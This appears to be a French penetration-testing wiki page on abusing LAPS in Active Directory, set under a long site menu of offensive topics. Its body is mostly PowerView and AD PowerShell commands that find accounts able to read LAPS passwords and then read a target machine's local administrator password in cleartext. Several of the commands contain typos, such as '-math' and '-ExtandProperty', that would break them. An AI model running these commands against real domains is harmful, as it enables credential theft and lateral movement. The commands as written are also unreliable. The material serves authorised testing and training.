Aller au contenu

paks3c

LAPS

paks3c

Home
Blue Team
Blue Team
- Analyse
  Analyse
  - Outils en ligne
  - SIEM
    SIEM
    
    Qradar
    Qradar
    
    Requêtes
    
    Splunk
    Splunk
    
    Requêtes
  - Doc
    Doc
    
    OleTools
  - Pcap
    Pcap
    
    DNS tunneling
    
    CheatSheet
    CheatSheet
    
    Wireshark
- CTI
  CTI
  - STIX
- Forensic
  Forensic
  - Disque
    Disque
    
    Dump disque
    
    Fichiers effacés
    
    MAC(b) Times (NTFS)
  - Logs
    Logs
    
    DeepBlueCli
    
    Hayabusa
    
    Liste EventID
  - Memoire
    Memoire
    
    Dump mémoire
    
    Methodologie
    
    CheatSheets
    CheatSheets
    
    Volatility 3 Cheatsheet
  - Registres
    Registres
    
    Clefs de registres
    
    Généralités
    
    Tools
- Mails
  Mails
  - Analyse de base
IT
IT
- Azure et Active Directory
  Azure et Active Directory
  - Cheatsheet
    Cheatsheet
    
    AZ Cli
    
    Administration Active Direcotry
    
    Powershell
  - Entra ID
    Entra ID
    
    Bases
    
    Entra Connect
    
    Entra Identity Protection
  - IaaS
    IaaS
    
    VM
  - PaaS
    PaaS
    
    Containers
- Cheatsheets
  Cheatsheets
  - Docker
  - Git
- Dev
  Dev
  - C
    C
    
    Bases
    Bases
    
    Boucles
    
    Conditions
    
    Fonctions
    
    Pointeur
    
    Structure programme simple
    
    Structures
    
    Tableaux
    
    Variables et types
  - Python
    Python
    
    Bases
  - Rust
    Rust
    
    Bases
- Réseaux
  Réseaux
- Services
  Services
  - Mise en place serveur Apache
  - Nginx Proxy Manager
Misc
Misc
- CIDR
- Chiffrements
- Code HTTP
- Encodages
- Hash
- Table ASCII
Osint
Osint
- Lieux
  Lieux
- Tools locaux
  Tools locaux
  - Webcams publiques
- Tools online
  Tools online
  - Lieux
  - Personnes
Red Team
Red Team
- Audit de code
  Audit de code
  - PHP
- C2
  C2
  - Sliver
    Sliver
    
    Armory
    
    Utilisation
- Cheatsheets
  Cheatsheets
  - Base de données
    Base de données
    
    MSSQL
    
    MySQL
  - Tools
    Tools
    
    Mimikatz
    
    NetExec
    
    Nmap
    
    PowerView
    
    Rubeus
    
    SQLMap
  - Windows
    Windows
    
    Net
    
    RPC
- Linux
  Linux
  - Enumération
  - Privesc
    Privesc
    
    Groupe LXC LXD
    
    Shared Object
    
    Exploits
    Exploits
    
    Playbook Ansible
    
    Script Bash
    
    YAML deserialization
    
    Sudo
    Sudo
    
    GTFObins
    
    Ld preload
- Misc
  Misc
  - Création de wordlists
  - Format hash john the ripper
  - MagicByte
  - Msfvenom
  - Exploits divers
    Exploits divers
    
    VisualStudio
  - Reverse shell
    Reverse shell
    
    Spawn shell
  - Secrets
    Secrets
    
    Ansible Vault
    
    Cli xml
    
    Vault
  - Transfert de fichiers
    Transfert de fichiers
    
    Linux vers linux
    
    Serveurs temporaires
    
    Télécharger dans différents langages
    
    Télécharger depuis Windows
    
    Uploader depuis Windows
- Réseau
  Réseau
  - Découverte d'hôtes
  - Pivot via Ligolo ng
  - Pivot via SSH
  - Port forwarding via SSH
  - Wifi
    Wifi
    
    Wifite
- Services
  Services
  - DNS
    DNS
    
    Généralités
  - FTP
    FTP
    
    Généralités
  - HTTP
    HTTP
    
    Enumération générale
    
    Reconnaissance de domaine
    
    Verb Tampering
    
    CSRF
    CSRF
    
    Généralités
    
    DNS rebinding
    DNS rebinding
    
    Généralités
    
    Drupal
    Drupal
    
    Enumération
    
    File upload
    File upload
    
    Payloads
    
    IDOR
    IDOR
    
    Généralités
    
    Injection de commande
    Injection de commande
    
    Généralités
    
    Payloads
    
    Joomla
    Joomla
    
    Bruteforce panel administration
    
    Enumération
    
    LFI
    LFI
    
    Généralités
    
    Payloads
    
    RFI
    RFI
    
    Généralités
    
    SQL injection
    SQL injection
    
    Généralités
    
    SSTI
    SSTI
    
    Généralités
    
    Payloads
    
    Tomcat
    Tomcat
    
    Bruteforce Manager
    
    Werkzeug
    Werkzeug
    
    Console de debug
    
    Wordpress
    Wordpress
    
    WPscan
    
    XSS
    XSS
    
    Généralités
    
    Payloads
    
    XXE
    XXE
    
    Généralités
  - MSSQL
    MSSQL
    
    Généralités
    
    Relais NTLM
  - MySQL
    MySQL
    
    Généralités
  - NFS
    NFS
    
    Généralités
    
    Nfs no root squashfs
  - POP3 IMAP
    POP3 IMAP
    
    Généralités
  - SMTP
    SMTP
    
    Généralités
  - SNMP
    SNMP
    
    Généralités
- Windows
  Windows
  - Enumération locale
  - Shell depuis linux
  - Active Directory
    Active Directory
    
    ADIDNS
    
    AsrepRoasting
    
    Kerberoasting
    
    LAPS LAPS
    Table des matières
    
    Trouver les utilisateurs ayant le droit de lire les passwords LAPS
    
    Password et hash spraying
    
    Zerologon
    
    ACE ACL DACL
    ACE ACL DACL
    
    ExtendedRight User Force Change Password
    
    GenericAll
    
    GenericWrite GenericAll
    
    Self membership WriteProperty
    
    WriteDACL + WriteOwner
    
    ADCS
    ADCS
    
    Enumeration
    
    Enumeration
    Enumeration
    
    Depuis Linux
    
    Depuis Windows
    
    Groupes
    Groupes
    
    Backup Operator
    
    Dnsadmin
    
    Print Operator
    
    Server Operators
    
    Trust
    Trust
    
    Bidirectionnal
  - Privilèges
    Privilèges
    
    Always Install Elevated
    
    Compte de service avec peu de privilèges
    
    Event log reader
    
    Named Pipe
    
    SeBackup
    
    SeDebug
    
    SeImpersonate
    
    SeTakeOwnership
Ressources
Ressources
- Lexique
- Linux
  Linux
  - RAM
- Windows
  Windows
  - Kerberos
  - Lsass.exe
  - RAM
  - WinAPI
Writeup
Writeup
- HTB
  HTB
  - Machines
    Machines
    
    Bank
    
    Chatterbox
    
    Escape
    
    Legacy
    
    Manager
    
    Pov
    
    Resolute

LAPS

Pour savoir si LAPS est utilisé, nous pouvons voir si nous trouvons un fichier AdmPwd.dll dans le dossier C:\Program Files\LAPS\CSE

Trouver les utilisateurs ayant le droit de lire les passwords LAPS

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAce -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -math 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

Si on compromet un utilisateur ayant le droit de lire les LAPS, on peut lire le password en clair en utilisant :

Get-DomainObject -Identity targtmachine$ | select -ExpandProperty ms-mcs-admpwd
---
Get-ADComputer -Identity targetmachine -Properties ms-mcs-admpwd | select -ExtandProperty ms-mcs-admpwd